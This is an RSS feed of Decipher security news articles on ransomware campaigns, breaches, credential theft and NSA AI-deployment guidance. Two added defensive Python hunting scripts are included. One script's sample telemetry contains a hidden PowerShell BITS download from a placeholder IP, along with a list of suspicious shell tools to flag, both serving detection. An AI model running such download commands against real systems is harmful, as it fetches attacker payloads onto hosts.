<![CDATA[Decipher]]> https://decipher.sc Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. en-us info@decipher.sc (Amy Vazquez) Copyright 2024 3600 <![CDATA[Decipher Podcast: Source Code 4/26]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/decipher-podcast-source-code-4-26 https://duo.com/decipher/decipher-podcast-source-code-4-26

]]>
<![CDATA[Cactus Ransomware Group Targets Qlik Sense Servers]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/cactus-ransomware-group-targets-qlik-sense-servers https://duo.com/decipher/cactus-ransomware-group-targets-qlik-sense-servers

In an ongoing campaign that began in November, actors associated with the Cactus ransomware group are exploiting three vulnerabilities in the Qlik Sense data visualization platform to deploy ransomware, and researchers warn that there are thousands of vulnerable instances online at the moment.

The first indications of the activity emerged in November, when researchers observed attackers targeting the Qlik Sense vulnerabilities (CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365) in sporadic attacks. Qlik had released patches for the bugs in August after researchers at Praetorian disclosed them to the vendor. Three months later, the Cactus ransomware attacks began, and they all followed a similar pattern, from intrusion to deployment of post-exploitation tools to deployment of the ransomware itself.

“Following exploitation of Qlik Sense installations, the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes. The threat actors leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control,” an analysis by Arctic Wolf from November says.

Among the tools the actors downloaded were ManageEngine UEMS, AnyDesk, and PuTTY Link (plink). The attackers also disabled some security applications, changed admin passwords on compromised systems, and set up an RDP tunnel, which they used for lateral movement. Researchers say the attackers are also feeding victims false information about how they got in, in an effort to confuse incident response.

“Since November 2023, the Cactus ransomware group has been actively targeting vulnerable Qlik Sense servers. These attacks are not just about exploiting software vulnerabilities; they also involve a psychological component where Cactus misleads its victims with fabricated stories about the breach. This likely is part of their strategy to obscure their actual method of entry, thus complicating mitigation and response efforts for the affected organizations,” Willem Zeeman and Yun Zheng Hu of Fox IT said in a new analysis of the Cactus ransomware campaign.

Based on a scan from April 17, the Fox IT researchers identified more than 3,100 Qlik Sense servers that are vulnerable to the exploits used by the Cactus ransomware actors. The largest number of vulnerable servers are in the United States.

Cactus is a relatively young ransomware group, having emerged in early 2023. The group typically has exploited bugs in VPN appliances, along with the Qlik Sense servers, to gain initial access to a network. The highest profile intrusion on the group’s scorecard is an attack on Schneider Electric in January.

Organizations running potentially vulnerable Qlik Sense instances can check for the presence of two font files, qle.ttf and qle.woff, as indications of compromise. The attackers use those files, which are not part of the default installation of the server, to store command output.

“When the indicator of compromise artefact is present on a remote Qlik Sense server, it can imply various scenarios. Firstly, it may suggest that remote code execution was carried out on the server, followed by subsequent patching to address the vulnerability (if the server is not vulnerable anymore). Alternatively, its presence could signify a leftover artefact from a previous security incident or unauthorised access,” the Fox IT analysis says.
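The two hunting checks the article points to, the Scheduler.exe process lineage from the Arctic Wolf analysis and the qle.ttf/qle.woff artefacts from Fox-IT, as a worked example. This is added code for this page, not Fox-IT, Arctic Wolf or Qlik tooling; the allowlist of processes Scheduler.exe is expected to spawn, the severity tiers, the event field names and the sample paths and events are all assumptions, so tune them against your own baseline:

```python
"""Hunting for the Cactus / Qlik Sense activity described above.

Added example written for this article; it is not Fox-IT, Arctic Wolf or
Qlik code. Two checks:
  1. a filesystem sweep for the qle.ttf / qle.woff artefacts
  2. process-lineage triage for Scheduler.exe spawning unexpected children
The allowlist of expected children, the severity tiers and the sample
events and paths are assumptions.
"""
import ntpath  # Qlik Sense runs on Windows; ntpath parses those paths on any host
import os

# Font files the attackers drop to stash command output (Fox-IT IOC).
FONT_IOCS = {"qle.ttf", "qle.woff"}

# Assumption: processes Scheduler.exe is expected to launch on a healthy node.
EXPECTED_SCHEDULER_CHILDREN = {"engine.exe", "conhost.exe"}

# Tooling from the Arctic Wolf write-up: PowerShell and BITS for downloads.
HIGH_SIGNAL_CHILDREN = {"powershell.exe", "pwsh.exe", "bitsadmin.exe", "cmd.exe"}


def walk_files(root):
    """Yield every file path below `root` (run this on the Qlik server itself)."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            yield os.path.join(dirpath, name)


def find_font_artifacts(paths):
    """Return the paths whose file name matches a font IOC, sorted."""
    return sorted(p for p in paths if ntpath.basename(p).lower() in FONT_IOCS)


def scheduler_spawn_anomalies(events):
    """Flag process-creation events where Qlik's Scheduler.exe is the parent
    of a process it does not normally launch.

    Each event is a dict with keys parent_image, image and command_line,
    as you would get from Sysmon event 1 or EDR process telemetry."""
    findings = []
    for ev in events:
        parent = ntpath.basename(ev["parent_image"]).lower()
        child = ntpath.basename(ev["image"]).lower()
        if parent != "scheduler.exe" or child in EXPECTED_SCHEDULER_CHILDREN:
            continue
        severity = "high" if child in HIGH_SIGNAL_CHILDREN else "medium"
        findings.append({"severity": severity, "child": child,
                         "command_line": ev["command_line"]})
    return findings


# Constructed sample telemetry, not real incident data.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "image": r"C:\Program Files\Qlik\Sense\Engine\Engine.exe",
     "command_line": "Engine.exe"},
    {"parent_image": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -nop -w hidden -c "Start-BitsTransfer '
                     '-Source http://198.51.100.7/a.zip -Destination C:\\Windows\\Temp\\a.zip"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe"},
]

# Constructed sample paths; in production feed walk_files(install_root) instead.
SAMPLE_PATHS = [
    r"C:\Program Files\Qlik\Sense\Client\fonts\qle.ttf",
    r"C:\Program Files\Qlik\Sense\Client\fonts\OpenSans-Regular.ttf",
]

if __name__ == "__main__":
    for finding in scheduler_spawn_anomalies(SAMPLE_EVENTS):
        print(finding)
    print(find_font_artifacts(SAMPLE_PATHS))
```

The lineage check is the one worth keeping running: the font files only tell you something happened at some point, while Scheduler.exe launching PowerShell or bitsadmin is the live execution chain Arctic Wolf saw in every intrusion, and it fires before the post-exploitation tooling lands.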

]]>
<![CDATA[NSA Advisory Sheds Light on Securely Deploying AI Systems]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/nsa-advisory-sheds-light-on-securely-deploying-ai-systems https://duo.com/decipher/nsa-advisory-sheds-light-on-securely-deploying-ai-systems

A recent advisory from the NSA highlighted the ways that operators of national security systems and Defense Industrial Base companies can best securely deploy AI systems that have been designed by third parties.

Last week’s guidance, which comes as companies continue to weigh security risks inherent either in AI systems themselves or in how they are deployed, gave specific recommendations for securely operating AI in an existing environment and for continuously monitoring deployed AI systems for vulnerabilities. The advisory marked the first set of guidelines from the Artificial Intelligence Security Center, which the NSA established in September to help detect and counter AI flaws, develop and promote AI best practices, and drive collaboration across the industry on AI security.

“The rapid adoption, deployment, and use of AI capabilities can make them highly valuable targets for malicious cyber actors,” according to the NSA’s cybersecurity guidance, released jointly with a number of other Five Eyes agencies, including the UK’s National Cyber Security Centre and the Australian Signals Directorate. “Actors, who have historically used data theft of sensitive information and intellectual property to advance their interests, may seek to co-opt deployed AI systems and apply them to malicious ends.”

With organizations typically deploying AI systems within their existing infrastructure, the NSA said that security best practices and requirements also apply to AI systems. Cybersecurity gaps might arise if teams outside of IT are deploying the systems, and the NSA recommended that companies make sure that the person accountable for AI system security is also responsible for the organization’s cybersecurity in general. If organizations outside of IT are operating an AI system, they should work with IT to make sure the system is “within the organization’s risk level” overall. Organizations should also require AI system developers to provide a threat model for their system, which outlines potential threats and mitigations for those threats.

The question of data security and privacy for AI is critical. Companies implementing AI systems should map out all data sources the organization will use in AI model training, including, for models trained by others, the list of data sources those models were trained on, though notably such information is not typically made public. Additionally, security teams should apply existing best practices - like encrypting data at rest, implementing strong authentication mechanisms and ensuring the use of MFA - in the AI deployment environment.

“Do not run models right away in the enterprise environment,” according to the NSA. “Carefully inspect models, especially imported pre-trained models, inside a secure development zone prior to considering them for tuning, training, and deployment. Use organization approved AI-specific scanners, if and when available, for the detection of potential malicious code to assure model validity before deployment.”

The NSA also outlined steps that organizations should take after the initial implementation of AI in order to continuously make sure that data running through the system is secure, including testing the AI model for accuracy and for potential flaws after modifications have been made, evaluating and securing the supply chain for external AI models and data and securing potentially exposed APIs. Metin Kortak, CISO at Rhymetec, said that cybersecurity measures around actively monitoring model behavior are particularly significant because “AI can be unpredictable.”

“Prior to deploying AI systems, companies need to acknowledge and tackle data privacy and security concerns,” said Kortak. “AI systems inherently handle extensive datasets, encompassing sensitive personal and organizational data, rendering them enticing targets for cyber threats.”

]]>
<![CDATA[Ransomware Task Force: We Need to Disrupt Operations at Scale]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/ransomware-task-force-we-need-to-disrupt-operations-at-scale https://duo.com/decipher/ransomware-task-force-we-need-to-disrupt-operations-at-scale

While recent coordinated law enforcement efforts have been successful in temporarily knocking down ransomware groups like LockBit and BlackCat, a new report highlighted how the industry as a whole needs to scale disruption efforts against ransomware in order to see effective, long-term impacts.

The report was released Wednesday by the Institute for Security and Technology’s Ransomware Task Force (RTF), a coalition of more than 60 industry, government and law enforcement experts that made 48 recommendations in 2021 aimed at targeting the ransomware threat ecosystem. Though 24 of these 48 recommendations have seen significant progress, the remaining half have still not been fully implemented, and the RTF pinpointed areas where these measures could use further investment and resource allocations from governments, industry and civil society.

It's important to note that law enforcement agencies have carried out varying types of disruptive measures against ransomware groups over the last year, including efforts to target infrastructure, seize backend servers and take down darknet sites, as seen in the Hive and BlackCat disruptions. But more work beyond these efforts is needed, said the RTF report: While these have been temporarily disruptive to ransomware operations, they don’t fully eliminate the issue. The effectiveness of these operations is difficult to measure, for instance, and threat actors behind the groups have in some cases been able to rebuild their infrastructure or reassemble under new names.

“The purpose of disruptions is to throw as much sand in the gears as possible,” said Taylor Grossman, deputy director for digital security at the Institute for Security and Technology, in a video interview with Decipher. “The disruptions we’re seeing are affecting bottom lines. [Ransomware groups are] still active, which is a problem, and they’re still able to reform... so that’s where I think it’s about prioritization and resource allocation, making sure that governments have the manpower and financial resources to throw more people at this problem, to start to disrupt as much as possible.”

The RTF said that in order to better combat ransomware groups, government agencies need to work more closely with industry partners in order to “increase the costs associated with the ransomware profit model.” Part of that partnership should involve more clarity around lawful defensive measures that the private sector can take against ransomware groups, in order to help assuage concerns about legal liability.

“Providing clearer information about how and when companies can protect themselves without fearing later legal repercussions will increase the likelihood that they do so and enhance the defense of the entire ecosystem,” according to the report.

The report also pointed to increased information sharing as another critical piece for ransomware disruption. While cyber incident sharing measures - like CIRCIA and the SEC’s cyber rules - are coming together, the RTF said the government should also create more incentives for voluntary sharing in other areas that touch the ransomware ecosystem. For instance, more information sharing between cryptocurrency entities and law enforcement could lead to valuable insights about cryptocurrency accounts or transactions associated with ransomware actors.

The disruption of ransomware is complex, in part because it involves several stakeholders across the industry - including law enforcement and cybersecurity government agencies, private sector organizations, security researchers and cryptocurrency firms. At the same time, the ransomware threat landscape continues to evolve. A recent report released by Chainalysis in February recorded $1.1 billion in ransomware payments in 2023, a significant increase from the $567 million reported in 2022 and the highest number observed by the firm ever.

With all of these different moving pieces, the RTF called for an overhaul in some of the processes that entities are using to fight ransomware. The U.S. government should rethink how it incentivizes companies to adopt security measures outside of merely providing guidance for them, for instance, and do more to draw attention to the worst ransomware offenders. There should also be more “reciprocal sharing” of information in the partnerships formed around mitigating ransomware, the report said.

“Achieving progress on the remaining 24 RTF recommendations will help address the ransomware threat, and the U.S. and other governments worldwide will need to continue to act going forward,” according to the report. “At the same time, they should work toward driving adoption of secure-by-design and default across the ecosystem.”

]]>
<![CDATA[Defusing the Threat of Compromised Credentials]]> bnahorne@cisco.com (Ben Nahorney) https://duo.com/decipher/defusing-the-threat-of-compromised-credentials https://duo.com/decipher/defusing-the-threat-of-compromised-credentials

Let’s say that, during the middle of a busy day, you receive what looks like a work-related email with a QR code. The email claims to come from a coworker, requesting your help in reviewing a document. You scan the QR code with your phone and it takes you to what looks like a Microsoft 365 sign-in page. You enter your credentials; however, nothing seems to load.

Not thinking much of it, and being a busy day, you continue to go about your work. A couple minutes later a notification buzzes your phone. Not picking it up immediately, another notification comes. Then another, and another after that.

Wondering what’s going on, you grab the phone to find a series of multi-factor authentication (MFA) notifications. You had just attempted to log into Microsoft 365, maybe there was a delay in receiving the MFA notification? You approve one and return to the Microsoft 365 page. The page still hasn’t loaded, so you get back to work and resolve to check it later.

This is very similar to an attack that Cisco Talos Intelligence discusses in their latest Talos Incident Response (IR) Quarterly Report. In this case the Microsoft 365 sign-in page was fake, set up by threat actors. These attackers used compromised credentials to repeatedly attempt to sign in to the company’s real Microsoft 365 page, triggering the series of MFA notifications—an attack technique known as MFA exhaustion. In the end, some employees who were targeted approved the MFA requests and the attackers gained access to these accounts.

More than the annoyance of changing your password

While the use of QR codes is a relatively recent development in phishing, attacks like the one described by Talos have been around for years. Most phishing attacks employ similar social engineering techniques to trick users into turning over their credentials. Phishing is frequently one of the top means of gaining initial access in the Talos Incident Response Quarterly Report.

Attackers hammering MFA-protected accounts is also a concerning development in the identity threat landscape. But sadly, most successful credential compromise attacks occur with accounts that don’t have MFA enabled.

According to this quarter’s Talos IR report, using compromised credentials on valid accounts was one of two top initial access vectors. This aligns with findings from Verizon’s 2023 Data Breach Investigations Report, where the use of compromised credentials was the top first-stage attack (initial access) in 44.7% of breaches.

The silver lining is that this appears to be improving. Research published early last year by Oort, now part of Cisco, found that 40% of accounts in the average company had weak or no MFA in the second half of 2022. In updated telemetry from February 2024, that number has dropped significantly, to 15%. The change has a lot to do with wider understanding of identity protection, but also with increased awareness driven by an uptick in attacks targeting accounts protected by a password alone.

How credentials are compromised

Phishing, while one of the most popular methods, isn’t the only way attackers obtain credentials. They also run brute-force and password-spraying attacks, deploy keyloggers, or dump credentials from systems they already control.

These are just a few of the techniques that threat actors use to gather credentials. For a more elaborate explanation, Talos recently published an excellent breakdown of how credentials are stolen and used by threat actors that is worth taking a look at.

Not all credentials are created equal

Why might an attacker, who has already gained access to a computer, attempt to gain new credentials? Simply put, not all credentials are created equal.

While an attacker can gain a foothold in a network using an ordinary user account, it’s unlikely they’ll be able to further their attacks due to limited permissions. It’s like having a key that unlocks one door, where what you’re really after is the skeleton key that unlocks all the doors.

That skeleton key would be a high-level access account such as an administrator or system user. Targeting administrators makes sense because their elevated privileges allow an attacker more control of a system. And target them they do. According to Cisco’s telemetry, administrator accounts see three times as many failed logins as a regular user account.

Another resource threat actors target is credentials for accounts that are no longer in use. These dormant accounts tend to be legacy accounts for older systems, accounts for former users that have not been cleared from the directory, or temporary accounts that are no longer needed. Sometimes the accounts can include more than one of the above options, and even include administrative privileges.

Dormant accounts are an often-overlooked security issue. According to Cisco’s telemetry, 39% of the total identities within the average organization have had no activity within the last 30 days. This is a 60% increase from 2022.

Guest accounts are an account type that repeatedly gets overlooked. While a convenient option for temporary, restricted access, these often password-free accounts are frequently left enabled long after they are needed.

And their use is increasing. In February 2024, almost 11% of identities examined are guest accounts— representing a 233% jump from the 3% reported in 2022. While we can only speculate, it is possible that cloud-adoption and remote work contributed to this rise, as enterprises used temporary accounts to stage new services and applications or enable remote workloads in the short-term. The use of temporary accounts is understandable, but if they’re forgotten or ignored, these shortcuts represent a serious risk.

Reducing the impact of compromised credentials

It goes without saying that protecting credentials from being compromised and abused is important. However, eradicating this threat is challenging.

One of the best ways to defend against these attacks is by using MFA. Simply confirming that a user is who they say they are—by checking on another device or communication form—can go a long way towards preventing compromised credentials from being used.

However, it isn’t a silver bullet. There are a few ways that threat actors can sidestep MFA. Some MFA forms, such as those that use SMS one-time codes, can be subverted. In these cases, frequently grouped under Adversary in the Middle (AitM) attacks, the attacker obtains the code, whether by proxying the victim’s login through a phishing site that relays the code in real time, through social engineering, or by compromising the mobile device. The attacker can then enter the code when prompted and gain access to the targeted account.

The good news here is that there has been a drop in the use of SMS as a second factor. In 2022, 20% of logins leveraged SMS-based authentication. As of February 2024, this number has declined 66%, to just 6.6% of authentications. That is a tremendous change, and a positive one at that. In addition to AitM attacks, SIM swapping attacks have all but rendered SMS-based authentication checks useless.

This is backed up by research coming from the 2024 Duo Trusted Access Report, where using SMS texts and phone calls as a second factor has dropped to 4.9% of authentications, compared to 22% in 2022.

Going passwordless

If you really want to reduce your reliance on passwords when confirming credentials, passwordless authentication is another option. Passwordless authentication is a group of identity verification methods that don’t rely on passwords at all. Biometrics, security keys, and passcodes from authenticator apps can all be used for passwordless authentication. Of these, only origin-bound methods such as FIDO2/WebAuthn security keys and platform authenticators are phishing resistant; a one-time code from an authenticator app can still be relayed through a phishing proxy.

Based on the numbers, passwordless is the new trend. In 2022, phishing-resistant authentication methods such as passwordless accounted for less than 2% of logins. In 2024, Cisco’s telemetry shows this number climbing, currently representing 20%, nearly a 10x increase. This is great news, but it still highlights a critical point: 80% of logins still don’t use strong, phishing-resistant MFA.

Protecting MFA from threat actors

Recall the MFA exhaustion attack Talos described in their latest IR report. Talos’ example does highlight how there are select circumstances where attackers can still get past MFA. A distracted or frustrated user may simply accept a notification just to silence the application.

In this case, user education can go a long way towards preventing these attacks from succeeding, but there is more that can be done. It’s also important to have protections in place to detect unusual identity patterns based on behavior.

To illustrate, let’s look at when the threat actor begins hammering the login with the compromised credentials. Having monitoring in place that can recognize anomalies such as MFA floods, as well as the moment the user gets annoyed and accepts the request, can help to quickly alert to potentially malicious activity.

It’s also important to keep an eye out for other anomalies, such as a user signing in from an unmanaged device in a location that would be impossible for them to reach—say Peculiar, Missouri—given they had just logged in an hour ago from Normal, Illinois.
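An added example of the two behavioural checks described above, MFA push floods and impossible travel, run over constructed sign-in events. It is not Cisco or Duo code; the event shape, the flood threshold and window, the speed ceiling and the coordinates (which in practice would come from your GeoIP lookup) are assumptions:

```python
"""Identity-anomaly checks for the two patterns described above: MFA push
floods (the "MFA exhaustion" Talos describes) and impossible travel.

Added example, not Cisco or Duo code. Thresholds, the event shape, the
lat/lon values (assumed to come from your own GeoIP lookup) and the
sample events are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

PUSH_FLOOD_COUNT = 5                       # pushes inside the window = flood
PUSH_FLOOD_WINDOW = timedelta(minutes=10)
# Assumption: ceiling for surface travel. Raise toward ~800 km/h, or add an
# airport-overhead allowance, if your users routinely fly between logins.
MAX_PLAUSIBLE_SPEED_KMH = 300.0
EARTH_RADIUS_KM = 6371.0


def parse_events(raw):
    """Convert ISO-8601 timestamps in ingested/constructed events to datetimes."""
    return [dict(ev, ts=datetime.fromisoformat(ev["ts"])) for ev in raw]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlmb = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def detect_push_floods(events):
    """One finding per user who received >= PUSH_FLOOD_COUNT pushes inside
    PUSH_FLOOD_WINDOW; records whether a push was approved during the flood,
    which is the moment the attacker actually gets in."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["type"] in ("mfa_push_sent", "mfa_push_approved"):
            by_user[ev["user"]].append(ev)
    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        sends = [e["ts"] for e in evs if e["type"] == "mfa_push_sent"]
        for i, start in enumerate(sends):
            end = start + PUSH_FLOOD_WINDOW
            count = sum(1 for t in sends[i:] if t <= end)
            if count < PUSH_FLOOD_COUNT:
                continue
            approved = any(e["type"] == "mfa_push_approved" and start <= e["ts"] <= end
                           for e in evs)
            findings.append({"user": user, "pushes": count, "start": start,
                             "approved_after_flood": approved})
            break  # one finding per user is enough to page someone
    return findings


def detect_impossible_travel(events, max_speed_kmh=MAX_PLAUSIBLE_SPEED_KMH):
    """Compare each user's consecutive successful logins and flag any pair
    whose implied speed exceeds max_speed_kmh. Also reports whether the
    second login came from an unmanaged device, the combination called out above."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["type"] == "login_success":
            by_user[ev["user"]].append(ev)
    findings = []
    for user, logins in by_user.items():
        logins.sort(key=lambda e: e["ts"])
        for prev, cur in zip(logins, logins[1:]):
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if km < 1.0:
                continue  # same place (or same NAT egress); nothing to compute
            hours = max((cur["ts"] - prev["ts"]).total_seconds(), 1.0) / 3600.0
            kmh = km / hours
            if kmh > max_speed_kmh:
                findings.append({"user": user, "km": round(km, 1), "kmh": round(kmh, 1),
                                 "from": prev["geo"], "to": cur["geo"],
                                 "unmanaged_device": not cur["managed"]})
    return findings


# Constructed sample events, not real telemetry. Coordinates are rough town
# centres for Normal, IL and Peculiar, MO (about 509 km apart).
RAW_EVENTS = [
    {"ts": "2024-04-26T08:00:00+00:00", "type": "login_success", "user": "alice",
     "geo": "Normal, IL", "lat": 40.5142, "lon": -88.9906, "managed": True},
    {"ts": "2024-04-26T09:00:00+00:00", "type": "login_success", "user": "alice",
     "geo": "Peculiar, MO", "lat": 38.7192, "lon": -94.4586, "managed": False},
    {"ts": "2024-04-26T09:12:00+00:00", "type": "mfa_push_sent", "user": "alice"},
    {"ts": "2024-04-26T09:12:40+00:00", "type": "mfa_push_sent", "user": "alice"},
    {"ts": "2024-04-26T09:13:20+00:00", "type": "mfa_push_sent", "user": "alice"},
    {"ts": "2024-04-26T09:14:10+00:00", "type": "mfa_push_sent", "user": "alice"},
    {"ts": "2024-04-26T09:15:05+00:00", "type": "mfa_push_sent", "user": "alice"},
    {"ts": "2024-04-26T09:16:00+00:00", "type": "mfa_push_sent", "user": "alice"},
    {"ts": "2024-04-26T09:16:30+00:00", "type": "mfa_push_approved", "user": "alice"},
    {"ts": "2024-04-26T09:30:00+00:00", "type": "mfa_push_sent", "user": "bob"},
    {"ts": "2024-04-26T09:30:20+00:00", "type": "mfa_push_approved", "user": "bob"},
    {"ts": "2024-04-26T09:30:25+00:00", "type": "login_success", "user": "bob",
     "geo": "Normal, IL", "lat": 40.5142, "lon": -88.9906, "managed": True},
]
SAMPLE_EVENTS = parse_events(RAW_EVENTS)

if __name__ == "__main__":
    for f in detect_push_floods(SAMPLE_EVENTS) + detect_impossible_travel(SAMPLE_EVENTS):
        print(f)
```

A speed ceiling alone flags the Normal-to-Peculiar hop but would also flag a genuine flight between distant cities, so production rules usually pair it with a minimum elapsed time or an allowlist of known VPN egress points; the unmanaged-device flag is what should drive response priority, and the approved-during-flood flag is the one that warrants revoking the session rather than just alerting.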

User identities have become one of the most active battlegrounds in the threat landscape. While having MFA in place is critical, as well as implementing trusted access policies, it’s just as important to monitor logins for strange and anomalous behavior. Doing so can provide a leg up against attackers all the more interested in gaining access using compromised credentials.

Ben Nahorney is a threat intelligence analyst at Cisco.

]]>
<![CDATA[Decipher Podcast: Lachlan McGill and Euan Moore]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/decipher-podcast-lachlan-mcgill-and-euan-moore https://duo.com/decipher/decipher-podcast-lachlan-mcgill-and-euan-moore

]]>
<![CDATA[Change Healthcare Says Attackers Accessed PHI and PII]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/change-healthcare-says-attackers-accessed-phi-and-pii https://duo.com/decipher/change-healthcare-says-attackers-accessed-phi-and-pii

Two months after the initial disclosure of the ransomware attack on its network, Change Healthcare officials said the company has now determined that the attackers gained access to some protected health information and personally identifiable information “which could cover a substantial proportion of people in America”.

The company has been investigating the intrusion since it was discovered in late February, but most of the available information about the incident focused on the ransomware deployment and the effects on the company’s systems and its downstream partners and customers. The attack crippled much of Change Healthcare’s operations and, because the company handles data, transaction clearing, and payment and claims processing for a huge chunk of the U.S. healthcare industry, caused massive delays for thousands of providers and pharmacies around the country. On Tuesday, Change Healthcare said that its ongoing investigation has now found that the attackers were able to steal files that included both PHI and PII.

“Based on initial targeted data sampling to date, the company has found files containing protected health information (PHI) or personally identifiable information (PII), which could cover a substantial proportion of people in America. To date, the company has not seen evidence of exfiltration of materials such as doctors’ charts or full medical histories among the data,” the statement says.

“The company, along with leading external industry experts, continues to monitor the internet and dark web to determine if data has been published. There were 22 screenshots, allegedly from exfiltrated files, some containing PHI and PII, posted for about a week on the dark web by a malicious threat actor. No further publication of PHI or PII has occurred at this time.”

The attack on Change Healthcare has developed into one of the more potentially damaging and far-reaching such incidents in recent years. Given the depth of the company’s integration into the healthcare ecosystem in the U.S., the effects from the ransomware attack may still be unfolding in the coming months. Many practices, pharmacies, hospitals, and other organizations have experienced significant delays for both claims and payment processing as a result of the incident, and some pharmacy chains were unable to fill prescriptions for some time, as well.

The attack has been attributed to the ALPHV/BlackCat ransomware group, which had been the target of a disruption effort by law enforcement just two months before the Change Healthcare intrusion was discovered. The company said it paid a ransom to the attackers, reportedly $22 million. But some of the stolen data was published online anyway.

Federal regulators and legislators have followed the details of the breach closely, and Andrew Witty, the CEO of Change Healthcare’s parent company, UnitedHealth Group, will testify in a hearing before the House Energy and Commerce Committee on May 1 to discuss the effects of the attack on providers and patients.

“We know this attack has caused concern and been disruptive for consumers and providers and we are committed to doing everything possible to help and provide support to anyone who may need it,” said Witty.

]]>
<![CDATA[Nation-State Actors Exploited Ivanti Bugs to Hit MITRE]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/nation-state-actors-exploited-ivanti-bugs-to-hit-mitre https://duo.com/decipher/nation-state-actors-exploited-ivanti-bugs-to-hit-mitre

The MITRE Corporation on Friday disclosed a breach of one of the collaborative networks it uses for research, development and prototyping. MITRE said that in January attackers exploited two known Ivanti Connect Secure vulnerabilities to deploy sophisticated backdoors and harvest credentials.

MITRE, a nonprofit organization that manages federally funded research and development centers supporting government agencies in cybersecurity, defense, homeland security and more, is only the latest high-profile organization to be hit via Ivanti’s vulnerabilities in its Connect Secure and Policy Secure gateways - the U.S. Cybersecurity and Infrastructure Security Agency (CISA) was another recent target, according to officials. MITRE said that, in its specific incident, the nation-state actor behind the attack first performed reconnaissance before exploiting the Ivanti flaws in one of its VPNs and bypassing its multi-factor authentication measures via session hijacking.

“In April 2024 we confirmed that MITRE was subject to an intrusion into one of our research and prototyping networks," said Lex Crumpton and Charles Clancy with MITRE in a Friday post. "MITRE’s security team immediately began an investigation, cut off all known access to the threat actor, and brought in third-party Digital Forensics Incident Response teams to perform their own independent analysis alongside our in-house experts."

After initial access, attackers were able to move laterally and use a compromised administrator account to dig into the network’s VMware infrastructure. Though MITRE had followed best practices and instructions from Ivanti and the U.S. government to upgrade, replace and harden their Ivanti devices, they did not detect the lateral movement into the VMware infrastructure, said Crumpton and Clancy.

During the course of the incident response, MITRE took various measures, including isolating impacted systems and segments of the network to curb the scope of the attack, improving their monitoring of impacted systems and migrating to new systems.

“We launched multiple streams of forensic analysis to identify the extent of the compromise, the techniques employed by the adversaries, and whether the attack was limited to the research and prototyping network or had spread further,” according to Crumpton and Clancy. “While this process is still underway, and we have a lot more to uncover about how the adversary interacted with our systems, trusted log aggregation was perhaps the most important component to enabling our forensic investigation.”

MITRE said the investigation is ongoing and it is still working to determine the scope of the information potentially compromised. The impacted unclassified MITRE research and development system, called the Networked Experimentation, Research, and Virtualization Environment (NERVE), was launched in 2015 as a way to help researchers better collaborate with external labs and partners. MITRE said there is currently no indication that its core enterprise network or partner systems have been impacted.

The incident shows the continued level of fallout from Ivanti’s flaws, disclosed in January (CVE-2024-21887 and CVE-2023-46805), which have been widely exploited by threat actors and also led to an emergency directive by the U.S. government ordering federal agencies to temporarily disconnect all instances of the appliances from agency networks, perform a factory reset and then rebuild and upgrade them.

]]>
<![CDATA[Russian Group Forest Blizzard Deploying GooseEgg Tool to Exploit CVE-2022-38028]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/russian-group-forest-blizzard-deploying-gooseegg-tool-to-exploit-cve-2022-38028 https://duo.com/decipher/russian-group-forest-blizzard-deploying-gooseegg-tool-to-exploit-cve-2022-38028

Microsoft researchers have discovered a notorious Russian state-backed threat actor using a previously undocumented tool called GooseEgg to steal credentials and escalate privileges after gaining initial access to a new device.

The tool has been in use for at least four years and possibly longer, and it has the ability to exploit a Windows Print Spooler vulnerability (CVE-2022-38028), which wasn’t disclosed until 2022. Actors from a threat group that Microsoft calls Forest Blizzard, which is known more commonly as Fancy Bear or APT28, have deployed GooseEgg in attacks on a variety of targets in Europe and North America in recent years. The tool is relatively simple but is effective and has the ability to launch other apps and move laterally.

“Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations. While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks,” Microsoft said in a new analysis.

Forest Blizzard is a threat group associated with Russia’s GRU intelligence service and has been active for nearly 15 years. The group generally targets organizations of strategic value for Russia’s foreign policy objectives, including government agencies, technology providers, and higher education institutions.

“Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. GooseEgg is typically deployed with a batch script, which we have observed using the name execute.bat and doit.bat. This batch script writes the file servtask.bat, which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run servtask.bat,” Microsoft said in its analysis.

